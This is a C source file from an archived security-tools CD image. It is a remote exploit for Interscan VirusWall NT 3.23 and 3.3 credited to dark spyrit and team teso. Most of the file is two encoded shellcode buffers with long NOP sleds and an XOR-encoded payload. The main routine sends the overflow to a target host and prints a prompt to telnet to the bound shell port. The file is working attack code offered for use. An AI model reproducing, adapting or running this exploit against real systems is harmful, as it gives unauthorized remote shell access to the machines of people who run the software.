home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
antivirus
/
interscan
/
vwxploit.c
< prev
Wrap
C/C++ Source or Header
|
2005-02-12
|
14KB
|
411 lines
/* Interscan VirusWall 3.23/3.3 remote
* by dark spyrit <dspyrit@beavuh.org>
* quick unix port by team teso (http://teso.scene.at/).
*
* further information at http://www.beavuh.org.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
/* local functions
*/
void usage (void);
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* shellcode by dark spyrit
*/
unsigned long sploit_323_len = 1314;
unsigned char sploit_323[] =
"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xbb\x10\x0b\x11\x01\xc1\xeb"
"\x02\x8b\xf8\x33\xc0\x50\x48\x90\x50\x59\xf2\xaf"
"\x59\xb1\xc6\x8b\xc7\x48\x80\x30\x99\xe2\xfa\x33"
"\xf6\x96\x90\x90\x56\xff\x13\x8b\xd0\xfc\x33\xc9"
"\xb1\x0b\x49\x32\xc0\xac\x84\xc0\x75\xf9\x52\x51"
"\x56\x52\x66\xbb\x34\x43\xff\x13\xab\x59\x5a\xe2"
"\xec\x32\xc0\xac\x84\xc0\x75\xf9\x66\xbb\xc4\x42"
"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x06\x32\xc0"
"\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\x66\xbb\x34"
"\x43\xff\x13\xab\x59\x5a\xe2\xec\x83\xc6\x05\x33"
"\xc0\x50\x40\x50\x40\x50\xff\x57\xe8\x93\x6a\x10"
"\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33"
"\xc0\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x48"
"\x50\x57\x56\xad\x56\xff\x57\xc0\x48\x50\x57\xad"
"\x56\xad\x56\xff\x57\xc0\x48\xb0\x44\x89\x07\x57"
"\xff\x57\xc4\x33\xc0\x8b\x46\xf4\x89\x47\x3c\x89"
"\x47\x40\x8b\x06\x89\x47\x38\x33\xc0\x66\xb8\x01"
"\x01\x89\x47\x2c\x57\x57\x33\xc0\x50\x50\x50\x40"
"\x50\x48\x50\x50\xad\x56\x33\xc0\x50\xff\x57\xc8"
"\xff\x76\xf0\xff\x57\xcc\xff\x76\xfc\xff\x57\xcc"
"\x48\x50\x50\x53\xff\x57\xf4\x8b\xd8\x33\xc0\xb4"
"\x04\x50\xc1\xe8\x04\x50\xff\x57\xd4\x8b\xf0\x33"
"\xc0\x8b\xc8\xb5\x04\x50\x50\x57\x51\x50\xff\x77"
"\xa8\xff\x57\xd0\x83\x3f\x01\x7c\x22\x33\xc0\x50"
"\x57\xff\x37\x56\xff\x77\xa8\xff\x57\xdc\x0b\xc0"
"\x74\x2f\x33\xc0\x50\xff\x37\x56\x53\xff\x57\xf8"
"\x6a\x50\xff\x57\xe0\xeb\xc8\x33\xc0\x50\xb4\x04"
"\x50\x56\x53\xff\x57\xfc\x57\x33\xc9\x51\x50\x56"
"\xff\x77\xac\xff\x57\xd8\x6a\x50\xff\x57\xe0\xeb"
"\xaa\x50\xff\x57\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5"
"\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9"
"\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9"
"\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc"
"\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6"
"\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc"
"\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde"
"\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce"
"\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8"
"\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99"
"\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99"
"\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2"
"\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed"
"\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc"
"\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x9b\x99"
"\xff\xff" /* 16 bit remote port number */
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xff\xff\xff\xff"
"\x60\x45\x42\x00\x0d\x0a";
unsigned long sploit_33_len = 794;
unsigned char sploit_33[] =
"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4b\x8b"
"\xc3\xbb\x01\x90\x16\x01\xc1\xeb\x02\x8b\xf8\x33"
"\xc0\x50\x48\x90\x50\x59\xf2\xaf\x59\xb1\xc6\x8b"
"\xc7\x48\x80\x30\x99\xe2\xfa\x33\xf6\x96\x90\x90"
"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x0b\x49\x32"
"\xc0\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\xb3\x80"
"\x90\x90\xff\x13\xab\x59\x5a\xe2\xec\x32\xc0\xac"
"\x84\xc0\x75\xf9\xb3\x01\x4b\x90\x56\xff\x13\x8b"
"\xd0\xfc\x33\xc9\xb1\x06\x32\xc0\xac\x84\xc0\x75"
"\xf9\x52\x51\x56\x52\xb3\x80\x90\x90\xff\x13\xab"
"\x59\x5a\xe2\xec\x83\xc6\x05\x33\xc0\x50\x40\x50"
"\x40\x50\xff\x57\xe8\x93\x6a\x10\x56\x53\xff\x57"
"\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0\x57\x50\xb0"
"\x0c\xab\x58\xab\x40\xab\x5f\x48\x50\x57\x56\xad"
"\x56\xff\x57\xc0\x48\x50\x57\xad\x56\xad\x56\xff"
"\x57\xc0\x48\xb0\x44\x89\x07\x57\xff\x57\xc4\x33"
"\xc0\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\x8b\x06"
"\x89\x47\x38\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c"
"\x57\x57\x33\xc0\x50\x50\x50\x40\x50\x48\x50\x50"
"\xad\x56\x33\xc0\x50\xff\x57\xc8\xff\x76\xf0\xff"
"\x57\xcc\xff\x76\xfc\xff\x57\xcc\x48\x50\x50\x53"
"\xff\x57\xf4\x8b\xd8\x33\xc0\xb4\x04\x50\xc1\xe8"
"\x04\x50\xff\x57\xd4\x8b\xf0\x33\xc0\x8b\xc8\xb5"
"\x04\x50\x50\x57\x51\x50\xff\x77\xa8\xff\x57\xd0"
"\x83\x3f\x01\x7c\x22\x33\xc0\x50\x57\xff\x37\x56"
"\xff\x77\xa8\xff\x57\xdc\x0b\xc0\x74\x2f\x33\xc0"
"\x50\xff\x37\x56\x53\xff\x57\xf8\x6a\x50\xff\x57"
"\xe0\xeb\xc8\x33\xc0\x50\xb4\x04\x50\x56\x53\xff"
"\x57\xfc\x57\x33\xc9\x51\x50\x56\xff\x77\xac\xff"
"\x57\xd8\x6a\x50\xff\x57\xe0\xeb\xaa\x50\xff\x57"
"\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda"
"\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc"
"\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6"
"\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa"
"\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8"
"\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4"
"\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8"
"\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc"
"\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5"
"\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xdc\xe1\xf0\xed"
"\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xca\xd6\xda"
"\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb"
"\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8"
"\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb"
"\xfc\xfa\xef\x99\x9b\x99"
"\xff\xff" /* sploit port number */
"\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\xb7"
"\xfc\xe1\xfc\x99\xff\xff\xff\xff\x09\x1f\x40\x00"
"\x0d\x0ah";
void
usage (void)
{
printf ("Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.\n"
"by dark spyrit <dspyrit@beavuh.org>\n"
"quick unix port by team teso\n\n"
"usage: vwxploit <host> <port> <port to bind shell> <version>\n"
"eg - vwxploit host.com 25 1234 3.23\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char **argv)
{
int socket;
unsigned char *shellcode;
unsigned char *sh_port_offset;
char *server;
unsigned short int port_dest, port_shell;
size_t sh_len;
struct sockaddr_in sa;
if (argc != 5)
usage ();
server = argv[1];
port_dest = atoi (argv[2]);
port_shell = atoi (argv[3]);
if (port_dest == 0 || port_shell == 0)
usage ();
if (strcmp (argv[4], "3.23") == 0)
{
shellcode = sploit_323;
sh_len = sploit_323_len;
sh_port_offset = sploit_323 + 1282;
}
else if (strcmp (argv[4], "3.3") == 0)
{
shellcode = sploit_33;
sh_len = sploit_33_len;
sh_port_offset = sploit_33 + 762;
}
else
{
fprintf (stderr, "unsupported version\n");
exit (EXIT_FAILURE);
}
port_shell ^= 0x9999;
*sh_port_offset = (char) ((port_shell >> 8) & 0xff);
*(sh_port_offset + 1) = (char) (port_shell & 0xff);
socket = net_connect (&sa, server, port_dest, 45);
if (socket <= 0)
{
perror ("net_connect");
exit (EXIT_FAILURE);
}
write (socket, shellcode, sh_len);
sleep (1);
close (socket);
printf ("data send, try \"telnet %s %d\" now\n",
argv[1], atoi (argv[3]));
exit (EXIT_SUCCESS);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr (host);
if (i == -1)
{
he = gethostbyname (host);
if (he == NULL)
{
return (0);
}
else
{
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0)
{
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1)
{
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1)
{
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0)
{
if (errno != EINPROGRESS)
{
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0)
{
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset))
{
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset))
{
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0)
{
errno = ETIMEDOUT;
return (-1);
}
if (error == 0)
{
goto done;
}
else
{
errno = error;
return (-1);
}
}
}
else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
/* www.hack.co.za [2000]*/
